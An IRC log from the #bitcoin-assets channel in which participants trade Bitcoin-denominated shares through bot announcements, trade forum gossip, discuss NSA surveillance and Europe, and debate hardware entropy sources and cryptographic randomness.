23 17:24:45 <assbot> [MPEX] [S.MPOE] 6000 @ 0.00084076 = 5.0446 BTC [-] {2} Oct 23 17:38:59 <assbot> [HAVELOCK] [AM100] 67 @ 0.00545598 = 0.3656 BTC [-] {4} Oct 23 17:42:33 <kakobrekla> mircea_popescu, bitcointalk ofc. Oct 23 17:43:03 <mircea_popescu> what was the post anyway ? Oct 23 17:43:14 <kakobrekla> https://bitcointalk.org/index.php?topic=67547.msg3393033#msg3393033 Oct 23 17:43:15 <ozbot> Starting a new FPGA mining farm/contract Cognitive Resurrected on [BTC-TC] Oct 23 17:43:30 <kakobrekla> its still there, the 3rd version of it or whatever. Oct 23 17:43:43 <kakobrekla> but badbear felt butthurt when i pmed him Oct 23 17:43:49 <kakobrekla> that i know that he is trying to push ban for me Oct 23 17:44:13 <kakobrekla> and now they plan to check all pms Oct 23 17:44:15 <mircea_popescu> weird. Oct 23 17:44:16 <kakobrekla> to see who leaked that info Oct 23 17:44:21 <kakobrekla> cause that is unacceptable! Oct 23 17:44:25 <kakobrekla> lolz. Oct 23 17:45:15 <mircea_popescu> what info you mean ? Oct 23 17:45:37 <kakobrekla> the info that he is pushing ban for me in the staff department forum Oct 23 17:45:53 <kakobrekla> and deleting my posts. Oct 23 17:47:12 <kakobrekla> it went like this Oct 23 17:47:20 <kakobrekla> 1. i post some stuff Oct 23 17:47:23 <kakobrekla> 2. it gets deleted Oct 23 17:47:27 <kakobrekla> 3. i re-post it Oct 23 17:47:37 <kakobrekla> 4. garr cries over my pm to leave britney alone Oct 23 17:47:46 <kakobrekla> 5. it gets deleted Oct 23 17:47:48 <kakobrekla> 6. i repost it Oct 23 17:47:57 <mircea_popescu> some stuff = ? Oct 23 17:47:58 <kakobrekla> 7. i get info who is deleting and trying to ban me Oct 23 17:48:07 <mircea_popescu> i don't think you;'re getting banned here for expliciting it. Oct 23 17:48:25 <kakobrekla> 8. i pm that douchebag that he should stop deleting to stop reposts Oct 23 17:48:31 <kakobrekla> 9. ban Oct 23 17:48:48 <kakobrekla> and 10. Oct 23 17:48:53 <kakobrekla> drama continiues in the mod department Oct 23 17:48:57 <Apocalyptic> sounds like btctalk indeed Oct 23 17:49:18 <kakobrekla> some stuff i guess is "the slander of garr" Oct 23 17:49:25 <kakobrekla> as garr put it. Oct 23 17:49:36 <kakobrekla> im just having some morning coffee forum fun Oct 23 17:50:24 <davout> i can confirm that the butthurt level rose in the mod sections Oct 23 17:51:13 <jcpham> i can confirm i've never used btctalk in the sense of this conversation Oct 23 17:51:14 <Apocalyptic> heh Oct 23 17:52:39 <Apocalyptic> davout, you still do btc-central's btc withdrawal manually ? Oct 23 17:54:06 <mircea_popescu> who the fuck cares anyway, not like that cryptowhatever is doing anything Oct 23 17:56:41 <davout> Apocalyptic: yes Oct 23 17:58:19 <assbot> [MPEX] [S.MPOE] 1050 @ 0.00084452 = 0.8867 BTC [+] Oct 23 18:00:53 <mircea_popescu> http://www.forbes.com/sites/kashmirhill/2013/09/04/shodan-terrifying-search-engine/ Oct 23 18:00:54 <ozbot> The Terrifying Search Engine That Finds Internet-Connected Cameras, Traffic Lights, Medical Devices, Oct 23 18:00:56 <mircea_popescu> that's kind of lulzy Oct 23 18:06:49 <kakobrekla> oh no! everything but the 'moron'! Oct 23 18:07:08 <mircea_popescu> lol Oct 23 18:40:51 <assbot> [MPEX] [S.MPOE] 4305 @ 0.00083849 = 3.6097 BTC [-] Oct 23 18:41:52 <assbot> [HAVELOCK] [AM1] 1 @ 0.62799999 BTC [+] Oct 23 18:55:06 <bitesak> hello Oct 23 18:55:29 <kakobrekla> hi Oct 23 19:00:49 <Rulother> hiyo Oct 23 19:22:40 <TATI> TAT.ASICMINER migrations form Bitfunder to Havelock now open for a limited time: https://bitcointalk.org/index.php?topic=192498.msg3395298#msg3395298 Oct 23 19:23:00 <TATI> from* Oct 23 19:23:34 <assbot> [MPEX] [S.MPOE] 2812 @ 0.00084278 = 2.3699 BTC [+] Oct 23 19:26:08 <dexX7> i assume you don't do 100x am100 -> am1 conversions? Oct 23 19:27:02 <TATI> nope Oct 23 19:27:49 <bitesak> ;;ticker Oct 23 19:27:50 <gribble> MtGox BTCUSD ticker | Best bid: 213.30515, Best ask: 215.76366, Bid-ask spread: 2.45851, Last trade: 215.76433, 24 hour volume: 27047.04154481, 24 hour low: 198.51000, 24 hour high: 216.00000, 24 hour vwap: 207.62934 Oct 23 19:41:47 <benkay> "None of us, none of the people in that room want to just accept these kinds of conditions written in a top-down fashion by the Foundation that is effectively today a US foundation." Oct 23 19:41:54 <benkay> http://bitcoinmagazine.com/7643/bitcoin-in-israel-interview-with-meni-rosenfeld-and-ron-gross-part-2/ Oct 23 19:41:55 <ozbot> Bitcoin in Israel: Interview with Meni Rosenfeld and Ron Gross, Part 2 – Bitcoin Magazine Oct 23 19:42:47 <benkay> tee hee us bitcoin "foundation" rejected like a tryhard Oct 23 19:56:06 <assbot> [HAVELOCK] [AM1] 1 @ 0.627 BTC [-] Oct 23 19:57:28 <mircea_popescu> benkay such a shocker. Oct 23 19:57:42 <mircea_popescu> you mean nobody cares about yet another group of posers ?! but who could have imagiend this! Oct 23 20:01:11 <assbot> [HAVELOCK] [AM100] 33 @ 0.00545001 = 0.1799 BTC [-] Oct 23 20:02:12 <assbot> [HAVELOCK] [AM100] 21 @ 0.00545001 = 0.1145 BTC [-] Oct 23 20:02:28 <mircea_popescu> https://bitcointalk.org/index.php?topic=310985.msg3382569#msg3382569 from the lulz department. Oct 23 20:02:29 <ozbot> Bitfunder - no reason for a fire sale Oct 23 20:05:27 <mircea_popescu> http://mikethegoat.wordpress.com/2013/10/22/assessing-the-state-of-pgp-keys-with-phuctor/ Oct 23 20:05:29 <ozbot> Assessing The State Of PGP Keys With Phuctor | Mike the Crypto Goat Oct 23 20:07:02 <dexX7> "the latter guy is uh, infamous in the bitcoin world" :D Oct 23 20:08:12 <mircea_popescu> lol Oct 23 20:08:16 <mircea_popescu> left him a comment. Oct 23 20:08:18 <assbot> [MPEX] [S.MPOE] 7700 @ 0.00083669 = 6.4425 BTC [-] {4} Oct 23 20:16:26 <assbot> [HAVELOCK] [AM1] 50 @ 0.57751099 = 28.8755 BTC [-] {9} Oct 23 20:22:09 <pankkake> I'm not sure central bank governor is a good title. sounds like scammer mafia boss Oct 23 20:23:35 <mircea_popescu> we're troll baiting each other Oct 23 20:28:38 <assbot> [MPEX] [S.MPOE] 3450 @ 0.00083662 = 2.8863 BTC [-] Oct 23 20:29:06 <deadweasel> http://www.usatoday.com/story/money/business/2013/10/23/crowdfunding-ipo-sec-jobs-act/3169395/ Oct 23 20:29:07 <ozbot> SEC moves toward allowing crowdfunding IPOs Oct 23 20:29:39 <assbot> [HAVELOCK] [B] [XBOND] 115 @ 0.0011487 = 0.1321 BTC [+] Oct 23 20:29:57 <ThickAsThieves> it will turn "salami" scams, where small amounts are defrauded from investors, into the new normal," Oct 23 20:30:08 <deadweasel> "This is not a good day for financially unsophisticated investors who will be targeted unrelentingly by stock promoters." Oct 23 20:30:12 <ThickAsThieves> cuz invetsors never got defrauded before Oct 23 20:30:44 <deadweasel> small time is easier. many more, harder to regulate, etc. Oct 23 20:30:52 <deadweasel> but yeah Oct 23 20:35:20 <mircea_popescu> yeah. Oct 23 20:35:43 <mircea_popescu> measure has its downsides, definitely. also kind of unavoidable. Oct 23 20:35:43 <deadweasel> crowdfunding americans are going to lose their shirts. Oct 23 20:35:57 <deadweasel> in general, we are exceedingly ignorant. Oct 23 20:36:03 <mircea_popescu> you mean the borrowed shirts they currently wear ? or what "their" ? Oct 23 20:36:15 <deadweasel> yes, we are wearing china's old t-shirts. Oct 23 20:36:20 <deadweasel> they are very soft and cozy. Oct 23 20:36:32 <deadweasel> because sweatshop kids wore them first. Oct 23 20:36:46 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.00114852 = 0.1149 BTC [-] {2} Oct 23 20:37:58 <deadweasel> hopefully, they will learn something and teach their kids and grandkids how to not be defrauded. but it's more likely they get drunk and beat them instead. Oct 23 20:39:49 <assbot> [HAVELOCK] [B] [XBOND] 350 @ 0.00114987 = 0.4025 BTC [+] {4} Oct 23 20:39:57 <pankkake> well, kickstarter shows americans are happy to lose their money already :) Oct 23 20:40:50 <assbot> [HAVELOCK] [B] [XBOND] 200 @ 0.00114989 = 0.23 BTC [+] {2} Oct 23 20:41:51 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.00114989 = 0.115 BTC [+] Oct 23 20:46:53 <mircea_popescu> yeah, what pman said Oct 23 20:46:56 <assbot> [HAVELOCK] [AM100] 70 @ 0.00545 = 0.3815 BTC [-] {2} Oct 23 20:47:01 <mircea_popescu> i seriously could not believe the stats of that thing Oct 23 20:47:22 <kakobrekla> urlpls Oct 23 20:47:35 <mircea_popescu> i mean... that in bitcoin crazy lalaland people like that scam whose name escapes me now take pride in 80% return rates is onme thing. but mainstream ? just wow. Oct 23 20:48:55 <mircea_popescu> http://thenextweb.com/insider/2013/07/26/board-game-creator-cans-123k-kickstarter-project-reinforces-the-platforms-accountability-issues/ Oct 23 20:48:56 <ozbot> No Accountability: Board Game Creator Cans $123K Kickstarter Project Oct 23 20:48:58 <assbot> [MPEX] [S.MPOE] 1295 @ 0.00083584 = 1.0824 BTC [-] Oct 23 20:49:02 <mircea_popescu> good example. but just google kickstarter scam Oct 23 20:49:44 <benkay> but mircea people are basically good Oct 23 20:49:54 <benkay> and make smart investments Oct 23 20:52:05 <mircea_popescu> yes. Oct 23 20:52:08 <mircea_popescu> except they do it in the ass. Oct 23 20:52:59 <Apocalyptic> they male smart investments until one day they don't... Oct 23 20:53:02 <Apocalyptic> *make Oct 23 20:59:09 <assbot> [MPEX] [S.MPOE] 4900 @ 0.00083508 = 4.0919 BTC [-] {3} Oct 23 21:00:10 <assbot> [HAVELOCK] [AM1] [PAID] 31.67198172 BTC to 8`451 shares, 374772 satoshi per share Oct 23 21:04:14 <assbot> [HAVELOCK] [VTX] 10 @ 0.380015 = 3.8002 BTC [-] Oct 23 21:04:15 <assbot> [HAVELOCK] [AM1] 1 @ 0.572 BTC [-] Oct 23 21:07:17 <assbot> [HAVELOCK] [B] [XBOND] 2458 @ 0.00114989 = 2.8264 BTC [+] Oct 23 21:12:20 <dexX7> https://hashfast.com/?p=2445&preview=true "taking a few weeks longer than expected" Oct 23 21:12:21 <ozbot> UPDATED SHIPPING NEWS | HashFast Technologies Oct 23 21:12:22 <assbot> [MPEX] [S.MPOE] 3385 @ 0.00083169 = 2.8153 BTC [-] Oct 23 21:22:32 <assbot> [HAVELOCK] [AM1] 7 @ 0.62799987 = 4.396 BTC [+] {2} Oct 23 21:24:34 <assbot> [MPEX] [S.MPOE] 1250 @ 0.00083662 = 1.0458 BTC [+] Oct 23 21:26:35 <assbot> [HAVELOCK] [CBTC] 1500 @ 0.00015 = 0.225 BTC [-] {2} Oct 23 21:33:58 <mod6> ;;seen #bitcoin-assets thestringpuller Oct 23 21:33:58 <gribble> thestringpuller was last seen in #bitcoin-assets 1 week, 2 days, 18 hours, 12 minutes, and 48 seconds ago: <thestringpuller> vis-a-vis Namworld the Canadian Oct 23 21:34:22 <mod6> wow. GTAV or a women has him pinned down. Oct 23 21:35:14 <nubbins`> hi Oct 23 21:36:40 <phungus> he's been absent from BitVPS as well Oct 23 21:36:50 <phungus> I think he's been overwhelmed by life recently Oct 23 21:36:57 <phungus> Namworld, that is Oct 23 21:37:02 <mod6> oh Oct 23 21:37:26 <mod6> is it looking for a home still? Oct 23 21:37:48 <kakobrekla> is he homeless? Oct 23 21:38:07 <phungus> BitVPS or Namworld? Oct 23 21:38:09 <phungus> :-) Oct 23 21:38:25 <kakobrekla> dunno , both Oct 23 21:38:27 <phungus> BitVPS == homeless as far as a share exchange goes Oct 23 21:38:31 <phungus> no idea about Nam Oct 23 21:39:07 <phungus> MPEX should offer us a sweet deal to re-list... hint hint Oct 23 21:39:33 <mod6> its been mentioned Oct 23 21:39:33 <phungus> we would probably do it Oct 23 21:39:42 <nubbins`> "I wonder whether one of the team should contact one of the keyservers and request a dump of their database. " Oct 23 21:39:45 <nubbins`> ^ Oct 23 21:40:40 <phungus> a $6500 fee to join an exchange is a little excessive though and I'm not sure but that might be a show-stopper right there Oct 23 21:40:43 <phungus> lol Oct 23 21:40:53 <phungus> if it's still 30BTC Oct 23 21:41:17 <phungus> we only got delisted because rg sold the corp to us and didn't tell anyone which broke the exchange rules Oct 23 21:41:48 <mod6> i rememeber vividly. Oct 23 21:41:50 <phungus> we're even more solid today than we were then tho Oct 23 21:41:56 <phungus> we own physical gear, etc Oct 23 21:42:09 <phungus> and have been profitable the whole year Oct 23 21:43:22 <nubbins`> there are mpex brokers Oct 23 21:43:39 <nubbins`> https://coinbr.com/about Oct 23 21:43:40 <ozbot> About CoinBr Oct 23 21:44:19 <skinnkavaj> pankkake Oct 23 21:44:20 <skinnkavaj> https://bitcointalk.org/index.php?topic=316810.0 Oct 23 21:44:22 <ozbot> [CRYPTOAVE.com] New BTC/DGC exchange IPO Oct 23 21:45:16 <nubbins`> !ticker --market bitstamp Oct 23 21:45:16 <assbot> Ah, your hair. Your hair is soft. It's like a girl's. Now how do you get it that way? Oct 23 21:45:18 <phungus> a Broker doesn't seem like it would help for listing Oct 23 21:45:23 <nubbins`> oh Oct 23 21:45:28 <nubbins`> ;;gpg eauth nubbins` Oct 23 21:45:28 <gribble> Request successful for user nubbins`, hostmask nubbins`!~nubbins`@stjhnf0148w-142134193006.dhcp-dynamic.FibreOp.nl.bellaliant.net. Get your encrypted OTP from http://bitcoin-otc.com/otps/CF2950F23C844002 Oct 23 21:45:31 <pankkake> whatcoin now? Oct 23 21:46:11 <nubbins`> phungus: no, but it would help for people buying/selling Oct 23 21:46:38 <phungus> yeah, I suppose so Oct 23 21:46:40 <nubbins`> ;;gpg everify freenode:#bitcoin-otc:1dcbd21828071f2ba4842d8ccd3869b43616b165010a4fef2c4aa785 Oct 23 21:46:41 <gribble> You are now authenticated for user nubbins` with key CF2950F23C844002 Oct 23 21:47:01 <nubbins`> it's 30 btc even if you're listing? Oct 23 21:47:25 <deadweasel> yes Oct 23 21:47:35 <deadweasel> pay the man! Oct 23 21:48:57 <assbot> [MPEX] [S.BBET] 2145 @ 0.00063999 = 1.3728 BTC [+] Oct 23 21:49:49 <mod6> you'd have to discuss listing with mp. and if bitvps was relisted, im pretty sure that at least the ceo/cfo would need to have an acct @ mpex to pay divs etc. Oct 23 21:49:58 <assbot> [HAVELOCK] [B] [XBOND] 851 @ 0.0011499 = 0.9786 BTC [+] {2} Oct 23 21:50:59 <assbot> [MPEX] [S.NSA] 5000 @ 0.000235 = 1.175 BTC [+] Oct 23 21:53:02 <assbot> [HAVELOCK] [B] [XBOND] 3158 @ 0.00115224 = 3.6388 BTC [+] {2} Oct 23 21:53:16 <mod6> even if the divs can be paid through a broker, i suppose that whatever float retained by the owners would need to be held somewhere, requiring an account. Oct 23 21:53:41 <mod6> verdad? Oct 23 21:54:04 <assbot> [MPEX] [S.BBET] 5000 @ 0.000648 = 3.24 BTC [+] Oct 23 21:56:05 <assbot> [MPEX] [S.MPOE] 2950 @ 0.00083468 = 2.4623 BTC [-] Oct 23 21:56:59 <the20year> howdee Oct 23 21:58:07 <assbot> [MPEX] [S.MPOE] 4165 @ 0.00083658 = 3.4844 BTC [+] Oct 23 22:00:09 <assbot> [HAVELOCK] [AM100] [PAID] 13.32992160 BTC to 374`436 shares, 3560 satoshi per share Oct 23 22:04:13 <assbot> [HAVELOCK] [B] [XBOND] 167 @ 0.001155 = 0.1929 BTC [+] Oct 23 22:08:51 <mod6> if you're angla merkel, would you believe obama when he says that he's not motitoring your phone calls? Oct 23 22:09:38 <deadweasel> you believe whatever he tells you to believe. Oct 23 22:10:03 <kleeck> I just read this gem of an article. Here's a very apt quote. Oct 23 22:10:04 <kleeck> "Crowdfunding today is rife with examples of consumers donating money to entrepreneurs, only for those people to take the money without ever producing the product or service that was pitched." Oct 23 22:10:17 <kleeck> http://www.usatoday.com/story/money/business/2013/10/23/crowdfunding-ipo-sec-jobs-act/3169395/ Oct 23 22:10:18 <ozbot> SEC moves toward allowing crowdfunding IPOs Oct 23 22:10:19 <assbot> [HAVELOCK] [HIM] 144 @ 0.06575096 = 9.4681 BTC [-] {11} Oct 23 22:10:20 <assbot> [MPEX] [S.MPOE] 7035 @ 0.00083658 = 5.8853 BTC [+] Oct 23 22:10:40 <mod6> deadweasel: haha Oct 23 22:11:20 <assbot> [MPEX] [S.MPOE] 415 @ 0.00083662 = 0.3472 BTC [+] Oct 23 22:11:54 <mircea_popescu> mod6 yeah. Oct 23 22:12:01 <mircea_popescu> but namworld has an account iirc Oct 23 22:12:42 <mod6> ah. ok Oct 23 22:13:33 <mircea_popescu> and no, the recent spying scandals have cost the us in europe more than what clinton has managed to build. Oct 23 22:13:50 <mircea_popescu> (bill clinton, that is) Oct 23 22:14:14 <mod6> maybe merkel needs to fool 'em with some phonograph whitenoise records. Oct 23 22:15:18 <mod6> a la cryptonomicon Oct 23 22:16:05 <mod6> i wouldn't believe a goddamn word these guys say, they've always got their fingers crossed. Oct 23 22:16:25 <assbot> [HAVELOCK] [VTX] 30 @ 0.32353353 = 9.706 BTC [-] {8} Oct 23 22:17:02 <mircea_popescu> actually there's some talk of the eu making its own sigint and ditching nato Oct 23 22:17:22 <mircea_popescu> "russians and the us equally hostile" and so on. Oct 23 22:18:04 <mod6> they certainly should. Oct 23 22:18:44 <asciilifeform> if dogs could speak, there would probably be talk among poodles of building their own walking parks and ditching humans. Oct 23 22:19:09 <mircea_popescu> except in this field the eu has more money and more human capital. Oct 23 22:20:01 <asciilifeform> mircea_popescu: what was the EU's answer to the U.S. demand for root privs on Galileo (EU GPS equiv.) ? Oct 23 22:20:17 <mircea_popescu> what year was that ? Oct 23 22:20:27 <asciilifeform> if i recall, the question was posed as 'give us an off switch or your sats get added to the target list.' Oct 23 22:20:36 <asciilifeform> couple of years ago Oct 23 22:20:50 <mircea_popescu> a lot has changed in those couple of years. Oct 23 22:21:06 <mircea_popescu> why, even last year the us could get away with kidnapping the future president of france. Oct 23 22:22:54 <asciilifeform> seems like the galileo people caved Oct 23 22:23:14 <asciilifeform> they agreed to move their freq. band away from u.s. gps, so it could be jammed separately. Oct 23 22:23:39 <mircea_popescu> im telling you, a lot has changed in the past ~6 months, and a lot in tjhe past 6 days. Oct 23 22:23:42 <asciilifeform> that's the sort of thing i was talking about. Oct 23 22:24:20 <asciilifeform> wake me up when they start publicly hanging us signint agents when caught in the wiring closets. Oct 23 22:24:46 <mircea_popescu> not likely they'll ever do that. Oct 23 22:25:01 <mircea_popescu> the yurpeans are romantics, they've not killed a spy since forever. Oct 23 22:25:29 <asciilifeform> so, not poodles? maybe occasionally ill-tempered ones, but where's the bite. Oct 23 22:25:58 <mod6> mara hati was the last? Oct 23 22:26:10 <mod6> *hari Oct 23 22:26:13 <mircea_popescu> what's this, infantry engagement ? spying is about information not killing people Oct 23 22:26:48 <mircea_popescu> mod6 mata hari was supposed to die in her bed, except they couldn't find it, so they did the next best thing : Oct 23 22:26:54 <mircea_popescu> tied to a pole with a bunch of dudes Oct 23 22:28:04 <asciilifeform> point, in that it isn't about blood per se, except to demonstrate intent. but which euro nation has banned u.s. OS on gov. hardware? Oct 23 22:28:15 <asciilifeform> look to me like they're happy to be pwned. Oct 23 22:28:31 <asciilifeform> just not publicly and loudly. Oct 23 22:28:41 <mod6> is sad really. Oct 23 22:29:23 <mircea_popescu> that impression is a great asset im sure. Oct 23 22:31:31 <mircea_popescu> rivkin's protestations to the contrary notwithstanding, the us has managed to drive itself into this narrow ally where practically speaking china is it's closest ally. Oct 23 22:31:43 <mircea_popescu> it's a sad state of affairs when a man can't really find a friend past his creditors. Oct 23 22:32:18 <mod6> true enough, you reap what you sow. Oct 23 22:33:35 <mod6> im paranoid enough as an american. they've got everyone on tap. if i was a forign int service, gov or private citizen, i'd boycott all us software, and rebuild. Oct 23 22:34:20 <mod6> no reason to use the stuff that comes with backdoors from these savages. Oct 23 22:34:21 <mircea_popescu> fortunately the foss was always big in europe Oct 23 22:37:08 <mod6> that always helps. Oct 23 22:38:19 <mod6> the nsa twisting nipples in enc algos and prngs is scary though. that stuff gets widespread. Oct 23 22:38:49 <mod6> not a lot of people can determine if its been diddled with or not Oct 23 22:39:50 <mod6> what was the one we were talking about most recently? the ECC backdoor? Oct 23 22:39:55 <mircea_popescu> maybe someone brings good quality hardware rngs to the masses. Oct 23 22:40:29 <mod6> :) Oct 23 22:41:06 <mod6> when that day comes, it'll be a great day for personal and ditital liberty. Oct 23 22:41:52 <KRS1-> doesn't their filtering/diddling cause a delay with time sensitive synchronization Oct 23 22:42:16 <mircea_popescu> notrly. Oct 23 22:44:23 <mod6> bah, *digital Oct 23 22:45:10 <asciilifeform> until everybody understands that cryptographic suitability is an entirely non-mathematical property of the bits (vs. entropic quality, an easily-quantified one) - people will be confused. Oct 23 22:45:33 <nubbins`> ^ Oct 23 22:45:36 <asciilifeform> cryptographic 'randomness' is a matter of provenance (as in this: http://ansuz.sooke.bc.ca/lawpoli/colour/2004061001.php) rather than entropy per se. Oct 23 22:46:20 <mircea_popescu> well, actually, randomness is not a property of numbers. it's a property of processes. Oct 23 22:46:37 <mircea_popescu> oldest observation in the book Oct 23 22:46:46 <mod6> thats the problem with hardware prng's, they can always be tampered with Oct 23 22:47:01 <nubbins`> haha, the color of bits re: 4'33 Oct 23 22:47:01 <mircea_popescu> "random number" really shuld be "number obtained randomly" Oct 23 22:47:12 <nubbins`> that's some seriously christian-based logic right there Oct 23 22:47:31 <nubbins`> http://en.wikipedia.org/wiki/Accident_(philosophy) Oct 23 22:47:44 <jcpham> christians are always right Oct 23 22:47:57 <assbot> [HAVELOCK] [CFIG] 15 @ 0.14288989 = 2.1433 BTC [+] {2} Oct 23 22:48:52 <nubbins`> http://en.wikipedia.org/wiki/Substance_theory Oct 23 22:48:58 <mircea_popescu> nubbins` how you mean ? Oct 23 22:49:22 <nubbins`> i mean when you take communion, you are, in the view of the church, literally eating the body of christ Oct 23 22:49:37 <nubbins`> now, it looks and acts like a plain unleavened wafer Oct 23 22:49:42 <mircea_popescu> well yes. Oct 23 22:49:49 <mircea_popescu> this is acquinas' idea. Oct 23 22:49:54 <nubbins`> yeah Oct 23 22:50:14 <nubbins`> and put into the context of 4'33 in the article asciilifeform linked Oct 23 22:50:33 <asciilifeform> it's not a philosophical question at all, re: the bits. their 'security' is a function of the bits and of the enemy's brain. if he knows (or might easily learn) them, they might be entropic, but not suitable for crypto. Oct 23 22:50:44 <nubbins`> "this string of zeroes isn't 4'33, but THIS string of zeroes *is*" Oct 23 22:50:54 <asciilifeform> the digits of 'pi' pass every test of entropy you can think of. (save one!) Oct 23 22:51:32 <mircea_popescu> i think you two are discussing different things Oct 23 22:51:35 <nubbins`> yeah Oct 23 22:51:44 <nubbins`> i didn't get more than a couple paragraphs into that article Oct 23 22:51:49 <nubbins`> and then i went off on a tangent Oct 23 22:52:05 <nubbins`> about transubstantiation :( Oct 23 22:55:40 <mircea_popescu> anyway, i must join my recommendation to the http://ansuz.sooke.bc.ca/lawpoli/colour/2004061001.php article. Oct 23 22:56:01 <mircea_popescu> it's one of those rare bits written by a competent translator, ie, one who has solid familiarity in two different fields. Oct 23 22:57:52 <asciilifeform> for the impatient: it wasn't about crypto per se, but still mandatory. Oct 23 22:58:49 <nubbins`> hm, i wonder if a contact mic would be useful in the context of RNGs Oct 23 22:58:57 <nubbins`> they're really small, and really cheap Oct 23 22:59:37 <mircea_popescu> for some values of useful. i prefer them to avalanche processes, but they have to be well filtered Oct 23 22:59:51 <asciilifeform> nubbins`: not that you can't use audio as an entropy seed, but most of it is incredibly periodic Oct 23 23:00:02 <nubbins`> hmm Oct 23 23:00:04 <asciilifeform> that's not even counting non-audio signals that the amp picks up (mains hum, for one) Oct 23 23:00:11 <nubbins`> ^ Oct 23 23:00:29 <nubbins`> maybe more suitable in a battery-operated device Oct 23 23:00:52 <nubbins`> on the surface it sounds great. rub the contact mic against any surface and get all the entropy you need Oct 23 23:01:01 <nubbins`> but i don't think it's quite that straight-forward Oct 23 23:01:02 <asciilifeform> think of all the periodic audio where you now stand. pc fan. wind. your breath. etc Oct 23 23:01:20 <nubbins`> yeah Oct 23 23:01:28 <nubbins`> these things are incredibly sensitive though Oct 23 23:01:29 <asciilifeform> plug it into an oscilloscope and instantly see what i meant. Oct 23 23:02:00 <nubbins`> well. incredibly sensitive to touch, incredibly insensitive to regular sources of sound Oct 23 23:02:15 <nubbins`> you can put one inside your mouth and scream, and it'll barely register Oct 23 23:02:31 <nubbins`> or you can rub a feather against it, and deafen yourself Oct 23 23:02:37 <mircea_popescu> <nubbins`> on the surface it sounds great. rub the contact mic against any surface and get all the entropy you need << o no, not at all. you can't use such low bits. Oct 23 23:03:11 <asciilifeform> point is, a piece of garbage that may seem 'random' to the naked eye can have all kinds of nice predictable patterns if one knows where to look. Oct 23 23:03:24 <nubbins`> yeah, guess that's the catch Oct 23 23:04:11 <nubbins`> any amplifier would introduce its own brand of consistency to the signal, &c &c Oct 23 23:04:32 <mircea_popescu> you're going the wrong way with the amplifiers Oct 23 23:04:45 <mircea_popescu> what you do is you put up a mic and sample it at 0.00000001 hz. Oct 23 23:04:48 <mircea_popescu> that's random enough Oct 23 23:04:59 <mircea_popescu> takes a while, but nevertheless. Oct 23 23:05:13 <assbot> [MPEX] [S.MPOE] 6350 @ 0.00083312 = 5.2903 BTC [-] Oct 23 23:05:20 <nubbins`> noise from contact mic fed into a non-linear equation as an input variable? Oct 23 23:05:42 <nubbins`> just thinking out loud here Oct 23 23:06:26 <mircea_popescu> that's just hashing Oct 23 23:06:40 <nubbins`> haha Oct 23 23:06:41 <nubbins`> that's right Oct 23 23:06:42 <asciilifeform> if you're ok with a glacially-slow entropy source, just expose a DRAM chip to sunlight, with deliberately inadequate refresh cycles, wait for radiation bit-flippage. Oct 23 23:07:32 <mircea_popescu> asciilifeform that's horribly biased. Oct 23 23:07:42 <dub> is it still going to be random if I control input into the mic? because its trvial to do that remotely Oct 23 23:08:02 <nubbins`> trivial? Oct 23 23:08:03 <asciilifeform> mircea_popescu: as vonneumann-debiasable as anything else Oct 23 23:08:05 <dub> yes Oct 23 23:08:11 <nubbins`> i've got one in my hand right now Oct 23 23:08:16 <nubbins`> control its input! Oct 23 23:08:58 <dub> I'd need to be a bit nearer to you but its doable Oct 23 23:09:08 <nubbins`> they're almost completely insensitive to air vibrations. you'd need to have it in your hand Oct 23 23:09:26 <nubbins`> hmm Oct 23 23:09:37 <dub> all you need is a radio and an amp Oct 23 23:09:39 <asciilifeform> nubbins`: anything attached to a human brain is a terrible source of entropy Oct 23 23:09:52 <asciilifeform> nubbins`: ever play with 'von neumann's mind reader' algo ? Oct 23 23:09:56 <nubbins`> nope Oct 23 23:11:41 <dub> nubbins`: http://lifehacker.com/5852903/silence-noisy-neighbors-by-transmitting-signals-through-their-own-speakers is an example but it might be easier to just introduce a less than random noise floor Oct 23 23:12:10 <asciilifeform> http://www.loper-os.org/p.cpp Oct 23 23:12:12 <asciilifeform> enjoy Oct 23 23:12:20 <assbot> [MPEX] [S.MPOE] 3000 @ 0.00083312 = 2.4994 BTC [-] Oct 23 23:12:26 <nubbins`> yeah, what i'm saying is that you'd deafen me before the contact mic would pick up the audio from my stereo Oct 23 23:12:40 <nubbins`> literally, i'd be dead with blood coming out of my ears Oct 23 23:12:50 <dub> you're wrong but keep talking Oct 23 23:13:12 <mircea_popescu> <nubbins`> control its input! << olo Oct 23 23:14:19 <mircea_popescu> asciilifeform you sghould make that a webservice. Oct 23 23:14:24 <nubbins`> contact mics are orders of magnitude more sensitive to touch vibration than air vibration Oct 23 23:14:32 <asciilifeform> i did at one point, lost the code Oct 23 23:14:36 <asciilifeform> the way the game works: Oct 23 23:14:41 <mircea_popescu> nubbins` the interraction happens through em not airwaves. Oct 23 23:14:45 <asciilifeform> you say '0' or '1' Oct 23 23:14:47 <nubbins`> o Oct 23 23:14:48 <asciilifeform> computer says '0' or '1' Oct 23 23:14:50 <dub> 20 years ago we could modulate an RF signal such that your skull would resonate a recognisable signal you would hear inside your head Oct 23 23:14:54 <asciilifeform> you tell it if it was correct Oct 23 23:15:04 <asciilifeform> it goes off and changes weights on markov chain. Oct 23 23:15:11 <asciilifeform> keeps score. Oct 23 23:15:17 <asciilifeform> human usually loses unless he cheats Oct 23 23:15:30 <asciilifeform> (starts counting letters in phrases from memory, flips coins, etc.) Oct 23 23:16:22 <asciilifeform> not my idea. attributed to johnny von n, but i was given it by my brother, who plucked it from an ancient soviet textbook. Oct 23 23:16:24 <assbot> [MPEX] [S.MPOE] 8550 @ 0.00083776 = 7.1628 BTC [+] {2} Oct 23 23:16:26 <mircea_popescu> if you make it a webservice this'll be a great group activity at april conference. Oct 23 23:16:36 <mircea_popescu> get everyone drunk, person with worst score picks up the tab Oct 23 23:16:40 <asciilifeform> sure why not! Oct 23 23:16:51 <nubbins`> hm. well, i guess if i was onto something here, it would've been figured out ages ago Oct 23 23:19:52 <mircea_popescu> "Hey, Reddit, Ycombinator, and Metafilter readers! You know what, I'm proud that this article has become a benchmark, but I've written a lot of others I like too, some of them more recently than 2004. It would sure be nice if my other articles got some love instead of just this one being linked from a discussion every week." Oct 23 23:20:06 <mircea_popescu> dude wrote an article a decade ago, which saw 100bn page loads and 34 comments. Oct 23 23:20:10 <mircea_popescu> understandably a little miffed Oct 23 23:21:29 <assbot> [HAVELOCK] [HIM] 3 @ 0.06999 = 0.21 BTC [+] Oct 23 23:21:30 <assbot> [MPEX] [S.MPOE] 9116 @ 0.0008392 = 7.6501 BTC [+] {2} Oct 23 